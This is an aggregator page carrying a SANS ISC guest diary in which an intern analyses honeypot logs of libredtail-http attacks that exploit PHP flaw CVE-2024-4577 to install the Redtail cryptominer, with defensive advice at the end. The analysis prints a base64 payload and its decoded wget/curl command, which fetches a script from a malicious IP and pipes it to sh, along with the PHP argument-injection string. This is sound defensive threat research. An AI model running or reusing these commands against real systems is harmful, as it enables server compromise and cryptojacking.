惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

B
Blog
C
Cybersecurity and Infrastructure Security Agency CISA
Microsoft Security Blog
Microsoft Security Blog
B
Blog RSS Feed
云风的 BLOG
云风的 BLOG
G
Google Developers Blog
Recent Announcements
Recent Announcements
A
About on SuperTechFans
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Google Online Security Blog
Google Online Security Blog
Google DeepMind News
Google DeepMind News
S
Schneier on Security
S
Secure Thoughts
T
The Exploit Database - CXSecurity.com
Martin Fowler
Martin Fowler
P
Proofpoint News Feed
Security Latest
Security Latest
Jina AI
Jina AI
D
Darknet – Hacking Tools, Hacker News & Cyber Security
Recorded Future
Recorded Future
T
Tor Project blog
有赞技术团队
有赞技术团队
H
Hackread – Cybersecurity News, Data Breaches, AI and More
N
News | PayPal Newsroom
博客园 - 三生石上(FineUI控件)
MyScale Blog
MyScale Blog
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Last Week in AI
Last Week in AI
F
Full Disclosure
Hacker News: Ask HN
Hacker News: Ask HN
Forbes - Security
Forbes - Security
D
DataBreaches.Net
人人都是产品经理
人人都是产品经理
NISL@THU
NISL@THU
C
Cisco Blogs
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Google DeepMind News
Google DeepMind News
Project Zero
Project Zero
IT之家
IT之家
T
Threatpost
Cyberwarzone
Cyberwarzone
O
OpenAI News
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
J
Java Code Geeks
P
Proofpoint News Feed
The Last Watchdog
The Last Watchdog
月光博客
月光博客
Latest news
Latest news
MongoDB | Blog
MongoDB | Blog
Apple Machine Learning Research
Apple Machine Learning Research

SANS Internet Storm Center, InfoCON: green

From a VHDX File to a Remcos RAT - SANS Internet Storm Center ISC Stormcast For Tuesday, June 16th, 2026 https://isc.sans.edu/podcastdetail/9974 Evil MSI Background: BASE64 Statistical Analysis - SANS ISC ISC Stormcast For Monday, June 15th, 2026 https://isc.sans.edu/podcastdetail/9972 ISC Stormcast For Friday, June 12th, 2026 https://isc.sans.edu/podcastdetail/9970 ISC Stormcast For Thursday, June 11th, 2026 https://isc.sans.edu/podcastdetail/9968 How has use of framing protection security headers changed in the past 3 years? ISC Stormcast For Wednesday, June 10th, 2026 https://isc.sans.edu/podcastdetail/9966 Microsoft June 2026 Patch Tuesday - SANS Internet Storm Center ISC Stormcast For Tuesday, June 9th, 2026 https://isc.sans.edu/podcastdetail/9964 TeamPCP Supply Chain Campaign: Activity Through 2026-06-07 ISC Stormcast For Monday, June 8th, 2026 https://isc.sans.edu/podcastdetail/9962 The Evil MSI Background is Back! - SANS Internet Storm Center ISC Stormcast For Friday, June 5th, 2026 https://isc.sans.edu/podcastdetail/9960 Microsoft's Coreutils for Windows - SANS Internet Storm Center ISC Stormcast For Thursday, June 4th, 2026 https://isc.sans.edu/podcastdetail/9958 Continuing Scans for swagger.json - SANS Internet Storm Center ISC Stormcast For Wednesday, June 3rd, 2026 https://isc.sans.edu/podcastdetail/9956 New Wave Of Phishing Emails with SVG Files - SANS ISC ISC Stormcast For Tuesday, June 2nd, 2026 https://isc.sans.edu/podcastdetail/9954 ISC Stormcast For Monday, June 1st, 2026 https://isc.sans.edu/podcastdetail/9952 Unidentified RAT pushes NetSupport RAT - SANS ISC YARA-X 1.17.0 Release - SANS Internet Storm Center ISC Stormcast For Friday, May 29th, 2026 https://isc.sans.edu/podcastdetail/9950 Analysis of a Year of Files Uploaded to DShield Sensors ISC Stormcast For Thursday, May 28th, 2026 https://isc.sans.edu/podcastdetail/9948 Reconstructing an Akira Ransomware Kill Chain from Perimeter and Endpoint Logs ISC Stormcast For Wednesday, May 27th, 2026 https://isc.sans.edu/podcastdetail/9946 ISC Stormcast For Tuesday, May 26th, 2026 https://isc.sans.edu/podcastdetail/9944 Possible ACR Stealer From Page Impersonating Claude Microsoft Access VBA - SANS Internet Storm Center Wireshark 4.6.6 Released - SANS Internet Storm Center An Example of Stack String in High Level Language - SANS ISC Cross-Platform NPM Stealer - SANS Internet Storm Center ISC Stormcast For Friday, May 22nd, 2026 https://isc.sans.edu/podcastdetail/9942 Selective HTTP Proxying in Linux - SANS Internet Storm Center ISC Stormcast For Thursday, May 21st, 2026 https://isc.sans.edu/podcastdetail/9940 ISC Stormcast For Wednesday, May 20th, 2026 https://isc.sans.edu/podcastdetail/9938 ISC Stormcast For Tuesday, May 19th, 2026 https://isc.sans.edu/podcastdetail/9936 TeamPCP Supply Chain Campaign: Activity Through 2026-05-17 [Guest Diary] New Malware Libraries means New Signatures ISC Stormcast For Friday, May 15th, 2026 https://isc.sans.edu/podcastdetail/9934 Simple bypass of the link preview function in Outlook Junk folder ISC Stormcast For Thursday, May 14th, 2026 https://isc.sans.edu/podcastdetail/9932 [GUEST DIARY] Tearing apart website fraud to see how it works. ISC Stormcast For Wednesday, May 13th, 2026 https://isc.sans.edu/podcastdetail/9930 Proxying the Unproxyable? Sending EXE traffic to a Proxy Microsoft May 2026 Patch Tuesday - SANS Internet Storm Center ISC Stormcast For Tuesday, May 12th, 2026 https://isc.sans.edu/podcastdetail/9928 Apple Patches Everything - SANS Internet Storm Center Why we use CAPTCHAs - SANS Internet Storm Center ISC Stormcast For Monday, May 11th, 2026 https://isc.sans.edu/podcastdetail/9926 YARA-X 1.16.0 Release - SANS Internet Storm Center Another Universal Linux Local Privilege Escalation (LPE) Vulnerability: Dirty Frag ISC Stormcast For Friday, May 8th, 2026 https://isc.sans.edu/podcastdetail/9924 ISC Stormcast For Wednesday, May 6th, 2026 https://isc.sans.edu/podcastdetail/9920 Cleartext Passwords in MS Edge? In 2026? - SANS ISC SSL.com rotates their root certificate today - SANS ISC ISC Stormcast For Tuesday, May 5th, 2026 https://isc.sans.edu/podcastdetail/9918 TeamPCP Weekly Analysis: 2026-W18 (2026-04-27 through 2026-05-03) DShield Honeypot Update - SANS Internet Storm Center ISC Stormcast For Monday, May 4th, 2026 https://isc.sans.edu/podcastdetail/9916 Wireshark 4.6.5 Released - SANS Internet Storm Center Malicious Ad for Homebrew Leads to MacSync Stealer ISC Stormcast For Friday, May 1st, 2026 https://isc.sans.edu/podcastdetail/9914 ISC Stormcast For Thursday, April 30th, 2026 https://isc.sans.edu/podcastdetail/9912 Today's Odd Web Requests - SANS Internet Storm Center ISC Stormcast For Wednesday, April 29th, 2026 https://isc.sans.edu/podcastdetail/9910 HTTP Requests with X-Vercel-Set-Bypass-Cookie Header ISC Stormcast For Tuesday, April 28th, 2026 https://isc.sans.edu/podcastdetail/9908 TeamPCP Supply Chain Campaign: Update 008 - 26-Day Pause Ends with Three Concurrent Compromises (Checkmarx KICS, Bitwarden CLI Cascade, xinference PyPI), CanisterSprawl npm Worm Identified, and Tier 1 Coverage Returns ISC Stormcast For Friday, April 24th, 2026 https://isc.sans.edu/podcastdetail/9906 Apple Patches Exploited Notification Flaw - SANS ISC ISC Stormcast For Thursday, April 23rd, 2026 https://isc.sans.edu/podcastdetail/9904 ISC Stormcast For Wednesday, April 22nd, 2026 https://isc.sans.edu/podcastdetail/9902 [Guest Diary] Beyond Cryptojacking: Telegram tdata as a Credential Harvesting Vector, Lessons from a Honeypot Incident, (Wed, Apr 22nd) A .WAV With A Payload - SANS Internet Storm Center ISC Stormcast For Tuesday, April 21st, 2026 https://isc.sans.edu/podcastdetail/9900 Handling the CVE Flood With EPSS - SANS Internet Storm Center ISC Stormcast For Monday, April 20th, 2026 https://isc.sans.edu/podcastdetail/9898 ISC Stormcast For Friday, April 17th, 2026 https://isc.sans.edu/podcastdetail/9896 Lumma Stealer infection with Sectop RAT (ArechClient2) ISC Stormcast For Thursday, April 16th, 2026 https://isc.sans.edu/podcastdetail/9894 [Guest Diary] Compromised DVRs and Finding Them in the Wild ISC Stormcast For Wednesday, April 15th, 2026 https://isc.sans.edu/podcastdetail/9892 Scanning for AI Models - SANS Internet Storm Center Microsoft Patch Tuesday April 2026. - SANS ISC ISC Stormcast For Tuesday, April 14th, 2026 https://isc.sans.edu/podcastdetail/9890 Scans for EncystPHP Webshell - SANS Internet Storm Center ISC Stormcast For Monday, April 13th, 2026 https://isc.sans.edu/podcastdetail/9888 Obfuscated JavaScript or Nothing - SANS Internet Storm Center ISC Stormcast For Thursday, April 9th, 2026 https://isc.sans.edu/podcastdetail/9886 Number Usage in Passwords: Take Two - SANS ISC TeamPCP Supply Chain Campaign: Update 007 - Cisco Source Code Stolen via Trivy-Linked Breach, Google GTIG Tracks TeamPCP as UNC6780, and CISA KEV Deadline Arrives with No Standalone Advisory More Honeypot Fingerprinting Scans - SANS Internet Storm Center ISC Stormcast For Wednesday, April 8th, 2026 https://isc.sans.edu/podcastdetail/9884 A Little Bit Pivoting: What Web Shells are Attackers Looking for? ISC Stormcast For Tuesday, April 7th, 2026 https://isc.sans.edu/podcastdetail/9882 How often are redirects used in phishing in 2026? - SANS ISC ISC Stormcast For Monday, April 6th, 2026 https://isc.sans.edu/podcastdetail/9880
Danger of Libredtail [Guest Diary] - SANS Internet Storm Center
2026-04-30 · via SANS Internet Storm Center, InfoCON: green

[This is a Guest Diary by James Roberts, an ISC intern as part of the SANS.edu BACS program]

Over the last few months, I have gained valuable experience working with the Internet Storm Center (ISC) operating a honeypot and analyzing its output via a SIEM environment.  This work gave me hands on experience with system set on a Raspberry Pi environment, utilizing command line interfaces, SIEM deployment, networking, and information analysis.  This experience was also a good demonstration of difficulty of finding useful information in a sea of logged data and how to find interesting items within it.  Some of the most interesting items were indicators relating to cryptomining malware.

DShield Honeypot

The DShield sensor is a honeypot system that information from HTTP, telnet, SSH, and firewall logs.  When deployed, it uses a Cowrie honeypot to simulate a Debian system to capture SSH and Telnet interactions, web.py and tcp-honeypot.py to simulate various services and obtain HTTP and TCP interactions, and finally scripts to collect, process and submit these and firewall logs.  These logs are sent to ISC, as well as an ELK SIEM that is set up on another system of mine.  With the SIEM, I was better able to parse, research, and understand the information produced by the various DShield logs.  Sometimes I would see something more interesting than just a standard SSH login attempt

Identifying Something Interesting

Around the halfway point in my internship, I did an attack observation about a type of cryptomining malware known as redtail.  After completing that observation, I noticed that there was another, different, variety of redtail based attacks I had previously not noticed, this time operating via HTTP instead of SSH/telnet.

As the most commonly occurring User Agent, and one of the most common items of HTTP information over the entire course of my DShield sensor’s deployment, I felt compelled to investigate further.

Overview of the Culprits

While I had 113 different IP addresses perform libertail-http activity on the DShield sensor, I am opting to focus my observation on the top three IP addresses for the sake of simplicity.

All three of these IP addresses attempted to perform the same attack multiple times over the course of several days.  The IP addresses came from different counties, Germany, Great Britain, and India.  All the observed libertail-http Ip addresses had similar general HTTP behavior, though there are some exceptions.  Most of the IP addresses observed additionally attempted to log in to the honeypot via SSH, as well as performing a SYN scan.

IP addresses 82.165.66.87 and 103.40.61.98 are almost identical in their behavior, even both exclusively using the same Username/Password login combination (admin/admin).  It is likely all the attackers are actually bots, but these two are likely using the same script to perform the same probing activity.  Based on other information that will be seen later, they might actually be the same attacker using different IP addresses.  Their behaviors are also more representative of the behavior observed by other attackers.  IP address 2.27.53.96 is much more aggressive in its attempt to log in with SSH and is less aggressive about the number of ports it scans.  Much of its activity is still similar to the other observed IP addresses, but it is unique in some ways.

Patterns of Behavior

Each of the attacks begins with a series of four HTTP POST actions.

From IP 103.10.61.98 on March 27 0623UTC

http.request.body            http.response.body.content                      url.query

The first two POST actions are effectively the same, with the only difference being that the first one uses URL encoding to traverse to /bin/sh while the second one doesn’t.  This directory traversal is attempting to look for CGI misconfigurations and allow the use of /bin/sh for command execution.  Additionally there is an attempt to connect to 31.57.216.121/sh through wget and curl.  On March 3, similar behaviors were logged for 178.16.55.224/sh instead.  IP address 82.165.66.87 also attempts to connect to both of these address as well and IP 2.27.53.96 additionally used 46.151.182.82.  After connecting via SH to an address, apache.selfrep is run.  Based on the name, apache.selfrep is likely a script designed to maintain persistence on a target.  IPs 31.57.216.121, 178.16.55.224, and 46.151.182.82 are known malicious IP addresses associated with cyrptomining malware infrastructure.  The url.query is the request.body information in its more original state, which is in base64.  The base64 encoding was likely done to obfuscate the attack or to more reliably deliver the attack against a wider variety of system or both.

The next two POST actions related directly to CVE-2024-4577, an exploit strongly associated with redtail malware that targets PHP services.  The request body line ”: d+allow_url_include=1+ d+auto_prepend_file=php://input” takes advantage of older PHP versions  flaw of replacing certain characters given into something else using a “Best-Fit” behavior that misinterprets characters as PHP options and allows running arbitrary PHP code.  In this case, that arbitrary code is being used to the inclusion of extra input from the HTTP request body.  That request body input accesses shell.exe and sends a base64 encoded set of commands 
KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMzEuNTcuMjE2LjEyMS9zaCB8fCBjdXJsIC1zayBodHRwczovLzMxLjU3LjIxNi4xMjEvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw”.  This can be decoded into (wget --no-check-certificate -qO- https://31.57.216.121/sh || curl -sk https://31.57.216.121/sh) | sh -s cve_2024_4577.selfrep). This is very similar commands found in the previous POST commands, running cve_2024_4577.selfrep as a different script.  Additionally, echo(md5("Hello CVE-2024-4577") is also run to print a message to indicate the previous commands have run correctly.  Like the other POST actions, the original query was encoded in base64.

Next the attack begins probing various .php installation paths.  The paths are requested, with “<?php echo(md5("Hello PHPUnit"));” created as a response if the requested path is found.  This reconnaissance is likely being done to map out what specific type of PHP is available and by extension what other vulnerabilities could be utilized in the future.

From IP 82.165.66.87 on March 27 12:55 UTC

http.request.body.content                                             http.response.body.content

In addition to the HTTP interactions, the IP addresses also attempt to interact with the honeypot by logging on via SSH and engaging in SYN scans on various ephemeral ports.  If a SSH login is successful, there are no attempts to run other commands.  The logins and port scans typically hours before or after the HTTP actions and are likely the bot engaging in those probing actions independently from anything related in HTTP.  The SYN scans consistently produced failures for the scanned ports.

From IP 2.27.53.96

Timestamp                               Source IP                                        Source port/outcome

Redtail Cryptomining Malware

While the attack engaged in several actions, perhaps the most important was running cve_2024_4577.selfrep.  That script is performs several actions, such as finding out about system architecture, finding directories to write new files, searching cronjobs relating to other cryptominers and stopping their services, and installing an appropriate version of redtail and naming it ‘.redtail’ to make it a hidden file.  The versions of redtail are x86_64, i686, aarch64, and arm7.  While redtail cryptominers have been part of the threat landscape since 2023, libredtail-http and CVE-2024-4577 started appearing later in mid 2024.

How to Protect against Redtail

Protection and remediation, why it matters

There are many things that can be done to protect against this type of attack.  If possible, patching to a more current version on PHP can help.  Writing a rule to block the libredtail-http user-agent on a WAF, reverse proxy, IPS, host firewall, or a tool like Fail2Ban could block the types of attacks seen here.  Rules could probably also be made to block traffic involving IP any variation of ip.ip.ip.ip/sh, something seen and these attacks and rarely ever seen in legitimate traffic.  Given the volume of http traffic created, monitoring the network activity for unusual behavior could help discover a compromise.  Setting up SSH shared keys or authentication against another server could help protect a system against unwanted SSH login attempts.

[1] https://isc.sans.edu/honeypot.html
[2] https://github.com/cowrie/cowrie
[3] https://infosecwriteups.com/honeypots-102-setting-up-a-sans-internet-storm-centers-dshield-honeypot-1ec1774bd949
[4] https://github.com/bruneaug/DShield-SIEM/blob/main/README.md
[5] https://192.168.80.139/app/dashboards#/view/d525c518-3e97-4375-9e38-ded8f18934a4?_g=(filters:!(),time:(from:now-90d%2Fd,to:now))
[6] https://www.joesandbox.com/analysis/1851676/0/html
[7] https://www.joesandbox.com/analysis/1890665/0/html
[8] https://www.joesandbox.com/analysis/1893948/0/html
[9] https://www.socdefenders.ai/threats/b91c3aa2-d17d-4621-8f76-99e3226bdecb
[10] https://nvd.nist.gov/vuln/detail/CVE-2024-4577
[11] https://www.forescout.com/blog/new-redtail-malware-exploited-via-php-security-vulnerability/
[12] https://roccosicilia.com/2025/07/15/cve-2024-4577-payload-analysis/
[13] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu